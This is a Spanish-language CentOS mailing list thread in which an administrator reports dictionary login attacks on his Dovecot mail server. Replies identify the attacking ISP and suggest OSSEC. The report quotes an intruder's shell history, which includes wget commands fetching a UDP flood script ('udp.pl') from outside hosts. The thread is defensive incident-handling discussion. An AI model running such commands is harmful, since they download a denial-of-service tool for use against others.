Configurate un servicio OSSEC es un detector de intrusos basado en host y rootkit El 22/03/2013 02:32, "Francesc Guitart" <francesc.guit...@enise.fr> escribió:
> Hola, > > Le 21/03/2013 16:55, Luis Alberto Roman Aguirre a écrit : > > Buenos días a todos de la lista: > > Primero que nada les cuento la experiencia que estoy pasando con mi > servidor de correos (postfix,dovecot+sasl), hace un mes aproximadamente he > notado que el servidor a las 5:00PM es atacado/escaneado o algo asi > tratando de conectarse al dovecot especificamente ,les posteo lo que > sale...--------------------- pam_unix Begin > > ------------------------ > > > > dovecot: > > > > Authentication > > Failures: > > > > contacto > > rhost=66.142.38.137 : 88 Time(s) > > > > > > [...] > > > turismo > > rhost=66.142.38.137 : 57 Time(s) .......... > ................. ............(hay mas resgisto q no lo pongo es > bastante todos salen de la misma ip) Unknown Entries: > > > > check pass; > > user unknown: 3901 Time(s) > > Al parecer es un diccionario que prueba esos usuarios para ingresar al > dovecot o bien al postfix.esto ya me pasa desde ya hace un mes y no puedo > detectar como y donde se ejecuta, pero si averigue que hicieron y que > se bajaron para realizar esto. > > el cual detallo, yo uso un Centos 6.0 64 bits, fue un usuario interno > con conocimiento basicos de linux ( al menos eso creo ) se conecto y hizo > eso, (lo saque del history)wget http://y2khom3.evonet.ro/udp.plwget > www.buble.biz/alinftp/udp.plwget > www.packetstormsecurity.org/DoS/udp.plping www.google.com.peps xcd /tmpls > -awpasswd mcondeexit > > El detalle es que desde ese momento ya tengo el problema que les > comente lineas arriba.. a alguien de ustedes la ha pasado de casualidad lo > mismo? espero me puedan alguna señal de como detectar de donde se ejecuta > dicho escaneo .si esta en mi server y siempre se ejecuta a esa hora?? o > es un scaneo externo. > > Saludos > > Luis Roman > > > > Como te ha respondido José Fernández los logs muestran intentos de > conexión desde la IP 66.142.38.137. Parece ser que se trata de una ADSL > de un proveedor de Internet del suroeste de los EEUU, SouthWestern Bell, > que a su vez parece ser propiedad de AT&T: > > adsl-66-142-38-137.dsl.kscymo.swbell.net > > Si siempre es esta IP la que trata de acceder a tu servidor contacta con > ellos, tienen una cuenta de correo para estos casos. Escríbeles a > ab...@swbell.net y explícales el problema. Deberían poner remedio. > > http://public.swbell.net/contact.html > > Saludos. > > > -- > Francesc Guitart > > > > > > _______________________________________________ > CentOS-es mailing list > CentOS-es@centos.org > http://lists.centos.org/mailman/listinfo/centos-es > _______________________________________________ CentOS-es mailing list CentOS-es@centos.org http://lists.centos.org/mailman/listinfo/centos-es
